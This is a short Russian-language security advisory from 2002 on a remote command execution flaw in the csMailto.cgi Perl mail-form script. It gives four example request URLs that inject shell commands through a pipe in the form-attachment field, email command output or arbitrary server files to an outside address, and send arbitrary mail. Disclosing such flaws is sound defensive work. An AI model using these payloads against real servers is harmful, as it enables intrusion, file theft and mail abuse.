Security Lab

Удаленное выполнение команд в csMailto.cgi

Дата публикации:30.04.2002
Всего просмотров:1099
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: csMailto – perl сценарий от CGIscript.net. Сценарий хранит все данные конфигурации в скрытых полях формы, полагаясь на то, что пользователь не будет изменять их. Также присутствует проверка поля refer, которую также легко обойти. Уязвимость позволяет выполнять произвольные команды на сервере, отправлять любые электронные сообщения, отправлять любые файлы на сервере любому пользователю и т.п. Пример:

1. Выполнение произвольных команд на сервере: CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&command=mailform

2. Выполнение команд на сервере и отправка результатов по электронной почте: CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|& Email=user@host.com&form-autoresponse=YES&command=mailform

3. Отправка произвольных файлов: CSMailto.cgi?form-attachment=FILEPATH_HERE&Email=user@host.com&form-autoresponse=YES&command=mailform

4. Отправка сообщений любому пользователю: CSMailto.cgi?form-to=to@host.com&form-from=from@host.com&form-subject=subject& form-results=body&command=mailform

Скрипт очень популярен и его используют более 17000 Web сайтов.

Ссылки: csMailto.cgi - Remote Command Execution